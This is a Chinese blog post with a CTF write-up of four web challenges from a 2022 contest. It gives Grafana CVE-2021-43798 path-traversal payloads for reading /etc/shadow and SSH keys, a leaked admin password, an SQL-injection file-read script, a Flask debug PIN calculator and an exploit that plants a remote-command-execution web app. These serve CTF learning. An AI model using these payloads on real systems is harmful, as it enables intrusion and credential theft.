[2022-* CTF]-WEB

最新推荐文章于 2024-05-17 14:32:46 发布
最新推荐文章于 2024-05-17 14:32:46 发布
阅读量509 收藏 1
点赞数 1
文章标签: 前端 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_53142368/article/details/124390061
版权

这次比赛体验也还行,题目质量出的很高,把wp记录下来
在这里插入图片描述

WEB:

oh-my-grafana

这个题目考的是grafana任意文件读取漏洞(CVE-2021-43798)
2021年12月6日,国外安全研究人员检测出grafana中某些接口在提供静态文件时,攻击者通过构造恶意请求,可造成目录遍历,读取系统上的文件。
读取敏感文件复现poc:

/public/plugins/alertlist/../../../../../../../../etc/passwd
/public/plugins/alertlist/../../../../../../../../var/lib/grafana/grafana.db #读取数据库文件
/public/plugins/alertlist/../../../../../../../../etc/grafana/grafana.ini #读取配置文件
 还可以读取的其他文件
 /conf/defaults.ini

/etc/grafana/grafana.ini

/etc/passwd

/etc/shadow

/home/grafana/.bash_history

/home/grafana/.ssh/id_rsa

/root/.bash_history

/root/.ssh/id_rsa

/usr/local/etc/grafana/grafana.ini

/var/lib/grafana/grafana.db

/proc/net/fib_trie

/proc/net/tcp

/proc/self/cmdline

该漏洞是由于grafana plugins引发的目录穿越漏洞导致任意文件读取,上述截图仅展示了grafana-clock-panel插件的效果。官方公布的受影响Plugins为40个。

/public/plugins/alertGroups/../../../../../../../../etc/passwd
/public/plugins/alertlist/../../../../../../../../etc/passwd
/public/plugins/alertmanager/../../../../../../../../etc/passwd
/public/plugins/annolist/../../../../../../../../etc/passwd
/public/plugins/barchart/../../../../../../../../etc/passwd
/public/plugins/bargauge/../../../../../../../../etc/passwd
/public/plugins/canvas/../../../../../../../../etc/passwd
/public/plugins/cloudwatch/../../../../../../../../etc/passwd
/public/plugins/dashboard/../../../../../../../../etc/passwd
/public/plugins/dashlist/../../../../../../../../etc/passwd
/public/plugins/debug/../../../../../../../../etc/passwd
/public/plugins/elasticsearch/../../../../../../../../etc/passwd
/public/plugins/gauge/../../../../../../../../etc/passwd
/public/plugins/geomap/../../../../../../../../etc/passwd
/public/plugins/gettingstarted/../../../../../../../../etc/passwd
/public/plugins/grafana-azure-monitor-datasource/../../../../../../../../etc/passwd
/public/plugins/grafana/../../../../../../../../etc/passwd
/public/plugins/graph/../../../../../../../../etc/passwd
/public/plugins/graphite/../../../../../../../../etc/passwd
/public/plugins/heatmap/../../../../../../../../etc/passwd
/public/plugins/histogram/../../../../../../../../etc/passwd
/public/plugins/influxdb/../../../../../../../../etc/passwd
/public/plugins/jaeger/../../../../../../../../etc/passwd
/public/plugins/live/../../../../../../../../etc/passwd
/public/plugins/logs/../../../../../../../../etc/passwd
/public/plugins/loki/../../../../../../../../etc/passwd
/public/plugins/mixed/../../../../../../../../etc/passwd
/public/plugins/mssql/../../../../../../../../etc/passwd
/public/plugins/mysql/../../../../../../../../etc/passwd
/public/plugins/news/../../../../../../../../etc/passwd
/public/plugins/nodeGraph/../../../../../../../../etc/passwd
/public/plugins/opentsdb/../../../../../../../../etc/passwd
/public/plugins/piechart/../../../../../../../../etc/passwd
/public/plugins/pluginlist/../../../../../../../../etc/passwd
/public/plugins/postgres/../../../../../../../../etc/passwd
/public/plugins/prometheus/../../../../../../../../etc/passwd
/public/plugins/stat/../../../../../../../../etc/passwd
/public/plugins/state-timeline/../../../../../../../../etc/passwd
/public/plugins/status-history/../../../../../../../../etc/passwd
/public/plugins/table-old/../../../../../../../../etc/passwd
/public/plugins/table/../../../../../../../../etc/passwd
/public/plugins/tempo/../../../../../../../../etc/passwd
/public/plugins/testdata/../../../../../../../../etc/passwd
/public/plugins/text/../../../../../../../../etc/passwd
/public/plugins/timeseries/../../../../../../../../etc/passwd
/public/plugins/welcome/../../../../../../../../etc/passwd
/public/plugins/xychart/../../../../../../../../etc/passwd
/public/plugins/zipkin/../../../../../../../../etc/passwd

该题目就是grafana存在未鉴权状态下的任意文件读取。

/public/plugins/alertlist/../../../../../../../../../../../../../etc/passwd
/public/plugins/alertlist/../../../../../../../../../../../../../etc/grafana/grafana.ini

读取到这个

# default admin user, created on startup
admin_user = admin

# default admin password, can be changed before first start of grafana,  or in profile settings
admin_password = 5f989714e132c9b04d4807dafeb10ade


# Either "mysql", "postgres" or "sqlite3", it's your choice
;type = mysql
;host = mysql:3306
;name = grafana
;user = grafana
# If the password contains # or ; you have to wrap it with triple quotes. Ex """#password;"""
;password = grafana

admin的密码是5f989714e132c9b04d4807dafeb10ade,利用Configuration里的Data sources功能,指定加载远程MySQL数据服务,通过执行SQL语句读取表信息和列信息,最后读出flag。

oh-my-notepro

Flask debug模式算pin码,pin码也就是flask在开启debug模式下,进行代码调试模式的进入密码,需要正确的PIN码才能进入调试模式
PIN生成要素

1. username,用户名
2. modname,默认值为flask.app
3. appname,默认值为Flask
4. moddir,flask库下app.py的绝对路径
5. uuidnode,当前网络的mac地址的十进制数
6. machine_id,docker机器id

username
通过getpass.getuser()读取,通过文件读取/etc/passwd

modname
通过getattr(mod,“file”,None)读取,默认值为flask.app

appname
通过getattr(app,“name”,type(app).name)读取,默认值为Flask

moddir
当前网络的mac地址的十进制数,通过getattr(mod,“file”,None)读取实际应用中通过报错读取

uuidnode
通过uuid.getnode()读取,通过文件/sys/class/net/eth0/address得到16进制结果,转化为10进制进行计算

machine_id
每一个机器都会有自已唯一的id,linux的id一般存放在/etc/machine-id或/proc/sys/kernel/random/boot_id,docker靶机则读取/proc/self/cgroup,其中第一行的/docker/字符串后面的内容作为机器的id,在非docker环境下读取后两个,非docker环境三个都需要读取

/etc/machine-id
/proc/sys/kernel/random/boot_id
/proc/self/cgroup

参考链接:https://blog.csdn.net/weixin_54648419/article/details/123632203
脚本读取文件内容 python3.8

import requests,random
session = requests.Session()
table_name  = "".join(random.sample('zyxwvutsrqponmlkjihgfedcba',5))
file = '/sys/class/net/eth0/address'
file = '/etc/machine-id'
file='/proc/self/cgroup'
payload1 = f'''1';create table {table_name}(name varchar(30000));load data  local infile "{file}" into table ctf.{table_name} FIELDS TERMINATED BY '\n';#'''
payload2 = f'''1' union select 1,2,3,4,(select GROUP_CONCAT(NAME) from ctf.{table_name})#'''
paramsGet1 = {"note_id":payload1}
paramsGet2 = {"note_id":payload2}
headers = {"Cache-Control":"max-age=0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9","Upgrade-Insecure-Requests":"1","User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36","Connection":"close","Accept-Encoding":"gzip, deflate","Accept-Language":"zh,zh-TW;q=0.9,en-US;q=0.8,en;q=0.7,zh-CN;q=0.6"}
cookies = {"session":"eyJjc3JmX3Rva2VuIjoiNjU5MmViODdhMjgwOGE4OTY0ZTRjMmU1Y2RlMWIxNGNiODM4MmNiNSIsInVzZXJuYW1lIjoiYWFhIn0.YlpeQg.VAhhSpogG4OT1bAytxIdRvyCxYk"}

response1 = session.get("http://121.37.153.47:5002/view", params=paramsGet1, headers=headers, cookies=cookies)
response2 = session.get("http://121.37.153.47:5002/view", params=paramsGet2, headers=headers, cookies=cookies)
print(response2.text)

算pin

#sha1
import hashlib
from itertools import chain
probably_public_bits = [
    'ctf'# /etc/passwd
    'flask.app',# 默认值
    'Flask',# 默认值
    '/usr/local/lib/python3.8/site-packages/flask/app.py' # 报错得到
]

private_bits = [
    '2485723369475',#  /sys/class/net/eth0/address 16进制转10进制
    #machine_id由三个合并(docker就1,3):1./etc/machine-id 2./proc/sys/kernel/random/boot_id 3./proc/self/cgroup
    '1cc402dd0e11d5ae18db04a6de87223d5a46d823f27edfa2c6c973c7e80fd24731bd56fc969e13f96e1868aa82dcde32'#  /proc/self/cgroup
]

h = hashlib.sha1()
for bit in chain(probably_public_bits, private_bits):
    if not bit:
        continue
    if isinstance(bit, str):
        bit = bit.encode('utf-8')
    h.update(bit)
h.update(b'cookiesalt')

cookie_name = '__wzd' + h.hexdigest()[:20]

num = None
if num is None:
    h.update(b'pinsalt')
    num = ('%09d' % int(h.hexdigest(), 16))[:9]

rv =None
if rv is None:
    for group_size in 5, 4, 3:
        if len(num) % group_size == 0:
            rv = '-'.join(num[x:x + group_size].rjust(group_size, '0')
                          for x in range(0, len(num), group_size))
            break
    else:
        rv = num

print(rv)

oh-my-lotto

有一次修改环境变量的机会——>从wget本地开的另一个服务获取到随机的lotto结果——>和
可控的预测结果匹配——>相同返回flag
如果wget没有获取到新的flag,那lotto结果就会是上局的结果,是已知的,就能通过。
这里是空的 (´・-・)ノ㊫
因此我通过修改环境变量PATH直接把wget拒之门外了,为了防止ban了其他的可能对正常流程影响的函数,就用通配符限制了一下

/usr/bin/ :/usr/bin/ ?:/usr/bin/???:/usr/bin/?????:/usr/bin/?????*

oh-my-lotto-revenge

当上传的forecast.txt文件内容与lotto_result.txt文件内容相符时,可以获得flag
POC:

from flask import Flask, request, make_response
import mimetypes

app = Flask(__name__)

@app.route("/")
def index():

    r = '''
from flask import Flask,request
import os


app = Flask(__name__)
@app.route("/test", methods=['GET'])
def test():
    a = request.args.get('a')
    a = os.popen(a)
    a = a.read()
    return str(a)

if __name__ == "__main__":
    app.run(debug=True,host='0.0.0.0', port=8080)
'''

    response = make_response(r)
    response.headers['Content-Type'] = 'text/plain'
    response.headers['Content-Disposition'] = 'attachment; filename=app.py'
    return response



if __name__ == "__main__":
    app.run(debug=True,host='0.0.0.0', port=8080)

题目使用gunicorn部署,app.py在改变的情况下并不会实时加载。但gunicorn使用一种pre-forked worker的机制,当某一个worker超时以后,就会让gunicorn重启该worker,让worker超时的POC如下

timeout 50 nc ip 53000 &
timeout 50 nc ip 53000 &
timeout 50 nc ip 53000

完整poc:

import requests
import os
import time
import subprocess

s = requests.session()

base_url = 'http://124.223.208.221:53000/'
url_upload = base_url + 'forecast'
proxies = {
    'http': 'http://127.0.0.1:8080'
}

r = s.post(url=url_upload, proxies=proxies, files={"file":("hosts", open('hosts', 'rb'))})
print(r.text)

url_env = base_url + 'lotto'
data = {
    'lotto_key': 'HOSTALIASES',
    'lotto_value': '/app/guess/forecast.txt'
}
r = s.post(url=url_env, data=data)

subprocess.Popen('./exploit.sh', shell=True)
# os.system('./exploit.sh')
for i in range(1, 53):
    print(i)
    time.sleep(1)

while True:
    url_shell = base_url + 'test?a=env'
    print(url_shell)
    r = s.get(url_shell)
    print(r.text)
    if '*ctf' in r.text:
        print(r.text)
        break
H0ne
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CTF-网络挑战
03-02
本项目只是对历届CTF开源的网站 申明 由于本人重新向出题人申请重新对过渡进行修改发布的权利,但对每个题均标明了出处,如涉嫌犯罪,立马致歉删除。 对于部分没找到flag的翻译,会自己随便添加 对已提供Dockerfile及sql文件的过渡会做适当的修改(或者重写,因为有的过渡按给的文件运行不起来。。可能是我打开的方式不对),对于大部分没有的版本,会自己编写(复制粘贴)提供相应的文件 如有bug,还望知道 建造 每道译文对应的端口需要自行在run脚本中更改 cd the_challenge chmod 777 build run ./build ./run 分类 SQLi RCE XSS SSRF 未盐化 文件包含 XXE 科学技术研究院
CTF-web学习大纲
01-30
CTF-web学习大纲
web-ctf-writeups
05-10
web-ctf-writeups web狗爬坑中的学习的writeup整合。 如果有师傅认为侵权,请联系我删除。另欢迎各位师傅投递链接。该repo会不断更新,最近更新日期为:2018/6/26。 N1CTF 大部分题解 777&&777 2&&babysqli Easy&&Hard Php 第二届强网杯 大部分题解 Python is the best language 强网杯教育机构的培训平台 http://pupiles.com/qiangwangbei2.html 0CTF/TCTF 大部分题解 https://www.lorexxar.cn/2018/04/05/0ctf2018-other/ EZDOOR https://www.cdxy.me/?p=790 https://blog.zsxsoft.com/post/36 2018 qUALS Bl0g https://blog
Web入门——信息搜集
wo41ge的博客
11-09 508
以下题目都来自这里 web1-查看源码 右键源代码 找到了 web2-URL查看源码 右键用不了 F12也用不了 但是 在URL前面加上view-source:也可以查看源代码 web3-HTTP响应 flag在HTTP响应中 web4-robots协议 上robots协议 果然是有的 访问就拿到了 web5-备份文件泄露 dirmap扫描,具体配置看这里 web6-备份源码泄露 ...
ctfd连接mysql_CTFd搭建笔记
weixin_35871890的博客
01-19 426
其实还有很多其他开源的CTF平台,之所以选择CTFd主要考虑到简便,成本低,DIY几个特性,FBCTF也是个很棒的比赛平台,界面很炫酷,但是资源占用比较大,另外因为被强,部署难度较麻烦,亲测后决定放弃。miniCTF功能不能满足需求。至于想深入了解去CTFd官网巧巧吧!CTFd是一款基于Apache2.0的协议的开源CTF平台,最新版本目前为1.20。该平台功能强大,基本上能够满足目前的CTF竞赛...
正确打开db文件的方式,避免乱码和无意义内容
热门推荐
haoranhaoshi的博客
11-28 14万+
db文件如果用记事本或者Notepad++打开,会显示乱码,改变编码不能解决问题,如果用UltraEdit打开,可以看到进制数据,但是无意义的。 正确的方法有两种: (1)用sqlitespy打开,下载网址为:https://www.yunqa.de/delphi/products/sqlitespy/index,而且是免安装的版本,它是一款类似Navicat的工具,轻巧易用,可以查看扩展名为sq...
Ctfer训练计划】——(四)
Demo不是emo的博客
12-24 1万+
ctf每日训练计划
[MTCTF]从出题人视角看ez_cms
Y4tacker的博客
05-23 1406
文章目录写在前面DockerhubWp 写在前面 太惨了,太傻了我,迷迷糊糊写了两天CMS,又累又自闭,还搞错了东西,给各位大师傅们道歉了,下面大师傅们要是瞧得上的化就那啥可以复现复现 Dockerhub docker pull y4tacker/ez_yxcms:1.0 随便写个docker-compose.yml version: "2" services: web: build: . image: yyds restart: always ports:
CTF---Web---SQL注入---05---MongoDB+宽字节注入
qq_22160557的博客
07-29 782
文章目录前言一、题目描述二、解题步骤1、分析传入参数2、判断注入方式3、宽字节注入三、总结 前言 题目分类: CTFWeb—SQL注入—05—MongoDB+宽字节注入 一、题目描述 题目:研究生的秘密 二、解题步骤 1、分析传入参数 Step1:http://192.168.87.173/index.php?title=Mysql%20%E6%95%99%E7%A8%8B ,查看源代码,,只有title的值等于页面的参数时,content才有内容 2、判断注入方式 Step2:当title=1时
CTF题目练习-3day
ZhangAweio的博客
05-28 469
原来是这个:将get_headers()与用户提供的URL一起使用时,如果URL包含零(\ 0)字符,则URL将被静默地截断。这可能会导致某些软件对get_headers()的目标做出错误的假设,并可能将某些信息发送到错误的服务器。这里多了一个 is_string 函数意思就是说必须为字符串,那么我们就不能用数组绕过了,我们可以考虑md5的碰撞。还让我达到2000分,做梦去吧,作为一个黑客,怎么能不修改源代码呢?首先看到的题目,应该是一个 CVE 具体是啥,我也没见过,我去翻翻资料。
2022--CTF-Web.pdf
07-09
2022--CTF-Web
ctf-web网络安全课程视频.zip
10-19
网盘文件永久链接 1 - 代码执行与命令执行安全漏洞与防御... 2 - 文件上传安全漏洞与防御... 3 - XXE安全漏洞与防御... 4 - SSRF安全漏洞与防御... 5 - PHP反序列化安全漏洞与防御... 6 - Python 安全开发基础...
CTF练习(3)-这个看起来有点简单!(SQL注入)
qq_35097943的博客
03-19 445
一、打开题目链接 题目链接:http://www.shiyanbar.com/ctf/33 看到一个表格,很容易联想到数据库,不过还是从源码看起 源码中是一个简单的table表格,看到代码中含有’1’,那么再看URl:http://ctf5.shiyanbar.com/8/index.php?id=1,id = 1? 可以分析出这可能是一个SQL注入点。 SQL注入:就是前端通过提...
live ctf 2022 部分web题解
weixin_51458899的博客
03-23 1225
[live_ctf_2022]Traveler 找到漏洞点rce,难度可以做新生赛练习题 [live_ctf_2022]Lovely Kitten Pictures 此题考察一个提权的过程,从发现漏洞到获取admin权限的途中,你会先后拿到4个flag,很不错的一个模式! 首先是一些简单的信息收集,之后会看到有path,猜测文件读写漏洞,之后就成功了! payload GET /pictures.php?path=assets/../../../../../../../var/www/html/cat_
【网络安全】CVE漏洞分析以及复现
Android_wxf的博客
04-21 1637
这个比 Shiro550、Shiro721 要增加一些东西,首先看 pom.xml 这个配置文件,因为漏洞是 shiro 1.0.0 版本的。Shiro 在路径控制的时候,未能对传入的 url 编码进行 decode 解码,导致攻击者可以绕过过滤器,访问被过滤的路径。的 bypass 方式也是合理的,可能一些其他特殊字符也是可以的,前提是对请求并不造成影响,像。继续往下走,判断 html 的目录与当前请求的目录是否相同,因为我们请求被拆分出来是。的匹配范围,这里之前我们设定的访问方式是。
ByteCTF_2019&XNUCA_2019部分web题复现
Lethe's Blog
09-11 4591
EzCMS 1、扫描目录有www.zip,下载得到源码。 整个题目的功能如下: index.php页面验证登陆,可以任意账号登陆到upload.php上传页面,但是只有admin账号才能进行文件上传。 访问了upload.php·,就会在沙盒下生成一个.htaccess文件,内容为:lolololol, i control all。 上传文件后,会返回文件的存储路径,view details可以...
CVE-2021-41773&&CVE-2021-42013复现
weixin_42345596的博客
10-09 4761
CVE-2021-41773 漏洞原理 Apache HTTP Server 是 Apache 基础开放的流行的 HTTP 服务器。在其 2.4.49 版本中,引入了一个路径体验,满足下面两个条件的 Apache 服务器将受到影响: 版本等于2.4.49 <Directory />Require all granted</Directory>(默认情况下是允许被访问的)。 攻击者利用这个漏洞,可以读取到Apache服务器Web目录以外的其他文件,或者读取Web中的脚本源码,或者在
微服务接入Jaeger分布式链路追踪
龙舷的博客
04-04 488
Jaeger是一款广受欢迎的开源分布式链路跟踪系统,兼容OpenTracing API,且已加入CNCF开源组织。输入外网IP:5601,访问kibana,第一次访问,成功就会显示一个欢迎语。镜像:jaegertracing/jaeger-collector:1.28。镜像:jaegertracing/jaeger-agent:1.28。镜像:jaegertracing/jaeger-query:1.28。找出ES的IP地址,例如:http://172.17.0.4。修改ES的IP为本地的IP。
WEB转Flutter基础学习笔记(内含vue和flutter对比)
最新发布
小易不止于搬砖的博客
05-17 775
笔者是一名web前端,记录在转栈flutter时的学习笔记,内涵和vue的对比,能够辅助前端同学更容易理解flutter
Apple-Mail CTF
07-27
回答: Apple-Mail CTF是一个CTF(Capture The Flag)比赛中的一个题目或挑战。根据提供的引用内容,我们无法确定具体的Apple-Mail CTF是什么样的题目或挑战。引用\[1\]提到了EML文件的常见文件扩展名,而引用\[2\]提到了MIME类型校验和文件上传的相关内容,引用\[3\]则是一个关于文件上传的POST请求的示例。根据这些信息,我们可以猜测Apple-Mail CTF可能涉及到文件上传和MIME类型校验的相关知识点。但具体的题目内容和解题方法需要进一步了解。 #### 引用[.reference_title] - *1* [CTF隐写术知识点总结](https://blog.csdn.net/qq_64584459/article/details/124649589)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insert_down1,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* *3* [[CTFHub] Web 文件上传 Write ups](https://blog.csdn.net/weixin_45646006/article/details/113890188)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insert_down1,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值